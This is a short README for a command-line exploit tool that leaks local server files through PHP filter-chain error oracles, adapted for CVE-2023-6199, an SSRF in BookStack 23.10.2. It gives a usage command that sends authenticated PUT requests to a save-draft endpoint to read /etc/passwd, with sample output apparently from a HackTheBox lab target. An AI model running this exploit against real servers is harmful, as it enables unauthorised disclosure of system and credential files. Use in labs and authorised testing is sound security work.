# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read caused by the the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case we use it to read file by exploiting an SSRF vulnerability in Book Stack version 23.10.2 identified by CVE-2023-6199, which allows filtering local files on the server

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)  
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)  
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)  
